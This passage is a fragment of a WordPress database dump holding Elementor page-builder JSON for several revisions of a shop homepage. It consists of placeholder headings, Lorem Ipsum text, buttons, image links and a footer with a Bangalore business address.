here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8269,1456,'_elementor_page_assets','a:0:{}'),(8271,1457,'_elementor_edit_mode','builder'),(8272,1457,'_elementor_template_type','wp-page'),(8273,1457,'_elementor_version','3.7.7'),(8274,1457,'_wp_page_template','elementor_canvas'),(8275,1457,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8276,1457,'_elementor_page_assets','a:0:{}'),(8279,1458,'_elementor_edit_mode','builder'),(8280,1458,'_elementor_template_type','wp-page'),(8281,1458,'_elementor_version','3.7.7'),(8282,1458,'_wp_page_template','elementor_canvas'),(8283,1458,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 